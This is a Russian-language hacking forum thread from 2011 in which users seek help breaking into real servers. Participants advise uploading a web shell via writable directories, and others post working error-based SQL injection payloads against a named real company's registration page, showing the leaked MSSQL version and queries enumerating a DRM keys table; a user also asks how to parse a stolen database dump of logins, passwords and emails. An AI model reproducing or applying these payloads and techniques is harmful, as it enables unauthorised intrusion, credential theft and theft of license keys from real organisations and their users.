24.08.2011, 05:09
|
|
Новичок
Регистрация: 15.05.2010
Сообщений: 0
С нами:
8417113
Репутация:
0
|
|
Сообщение от Ulitko
искал, гуглил, но не нашел мануала как рутать винду оО. Консолька в всо не канает. Мб кто подкинет мануальчик?
Не рутать, а получить права админа. Для этого есть эксплоиты, для начала посмотри это видео: https://forum.antichat.net/showpost.php?p=2770920&postcount=1
|
|
|
24.08.2011, 10:47
|
|
Познающий
Регистрация: 25.10.2007
Сообщений: 46
С нами:
9761387
Репутация:
2
|
|
Народ) собсно такой вопрос...
Вообщем есть скуль с правами Y, но нет папки на запись... инклуда тоже нет = \
Вообщем то нарыл доступ по ssh к этому серверу.....
но права у юзера уг
у моего юзера например директория /home/myuser а сайт лежит в дириктории /home/siteuser/
Можно ли как то залить шелл в корень сайта?)
Порутать сервак не получится = \ т.к.
Linux 2.6.18-238.12.1.el5 #1 SMP Tue May 31 13:23:01 EDT 2011 i686 athlon i386 GNU/Linux
Есть какие нибудь варианты как залить шелл ?))
|
|
|
|
24.08.2011, 18:45
|
|
Познающий
Регистрация: 03.03.2011
Сообщений: 51
С нами:
7997366
Репутация:
0
|
|
Сообщение от None
Можно ли как то залить шелл в корень сайта?)
Почему обязательно в корень сайта? Можно залить и скажем в images и другие подобные директории открытые на запись.. А потом, если необходимо, переместить шелл в корень...
Через SSH просмотри в /home/siteuser/ любую открытую на запись директорию, и лей, лей..
|
|
|
|
24.08.2011, 19:16
|
|
Познающий
Регистрация: 12.05.2011
Сообщений: 88
С нами:
7896566
Репутация:
1
|
|
здравствуйте, нашел интересную иньекцию, судя по всему mssql.Если в данной форме
Сообщение от None
http://www.socketmobile.com/support/wifi/pw.asp
ввести кавычку, вылетает ошибка.Как такое можно раскрутить? |
|
|
|
25.08.2011, 04:55
|
|
Постоянный
Регистрация: 02.11.2009
Сообщений: 341
С нами:
8696259
Репутация:
65
|
|
KUKLOVOD2, там не только эта бага)
но ссылку твою не получилось раскрутить
|
|
|
|
25.08.2011, 20:06
|
|
Познавший АНТИЧАТ
Регистрация: 27.08.2007
Сообщений: 1,107
С нами:
9846041
Репутация:
1177
|
|
Сообщение от RexTiam
KUKLOVOD2, там не только эта бага)
но ссылку твою не получилось раскрутить
POST http://www.socketmobile.com/support/wifi/pw.asp
POSTDATA( вариант 1): Email=1')+UNION+SELECT+1,2,@@version,4--+&submit=Send+Registration+Key
POSTDATA( вариант 2):
Email=asd')+OR+1=@@version--+&submit=Send+Registration+Key
Result:
Conversion failed when converting the nvarchar value ' Microsoft SQL Server 2005 - 9.00.4053.00 (Intel X86) May 26 2009 14:24:20 Copyright (c) 1988-2005 Microsoft Corporation Standard Edition on Windows NT 5.2 (Build 3790: Service Pack 2)' to data type int.
|
|
|
|
26.08.2011, 17:42
|
|
Познающий
Регистрация: 12.05.2011
Сообщений: 88
С нами:
7896566
Репутация:
1
|
|
значит все пытаюсь раскрутить эту скулю.Наблюдается интересное явление:при запросе
Сообщение от None
Email=1')+or+1=(SELECT+TOP+1+COLUMN_NAME+FROM+INFO RMATION_ SCHEMA.COLUMNS+WHERE+TABLE_NAME='View_DRM_Keys'+AN D+COLUMN_NAME+NOT+IN+('asscode ','assigndate','AssignedDate','assignedtype','assi gnusername','binary_message_body','cdkey','CDSeria lNum'))--+&submit=Send+Registration+Key
мы видим что существует колонка code в таблице View_DRM_Keys.Но когда делаем выборку:
Сообщение от None
Email=1')+or+1=(SELECT+TOP+1+code+from+View_DRM_Ke ys)--+&submit=Send+Registration+Key
видим следующее:Invalid column name 'code'.Почему так?
Потом поэксперементировав я обнаружил, что вытаскивая колонки из разных таблиц, вытакскиваются колонки с одними и теме же именами, хотя в данных таблицах они могут и не существовать.Что можно предпринять? |
|
|
|
27.08.2011, 00:30
|
|
Новичок
Регистрация: 30.05.2010
Сообщений: 10
С нами:
8395350
Репутация:
0
|
|
мб пишу не в правильную тему, но возникла такая проблема.
Сдампил бд mssql, там вот такой вид:
Код:
INSERT INTO tbl_xxx(id,password,accounttype,birthdate,BCodeTU,Email) VALUES ('login ','password ','0','Jan 01 1900 12:00AM','0','email');
как привести такие строчки к виду
??? |
|
|
|
27.08.2011, 00:33
|
|
Постоянный
Регистрация: 24.06.2009
Сообщений: 542
С нами:
8885780
Репутация:
672
|
|
сделай импорт базы, дальше возьми данные селектом, ну или спарси дамп))
|
|
|
|
27.08.2011, 00:43
|
|
Новичок
Регистрация: 30.05.2010
Сообщений: 10
С нами:
8395350
Репутация:
0
|
|
Сообщение от Konqi
сделай импорт базы, дальше возьми данные селектом, ну или спарси дамп))
а как дамп спарсить?)))
|
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Комбинированный вид
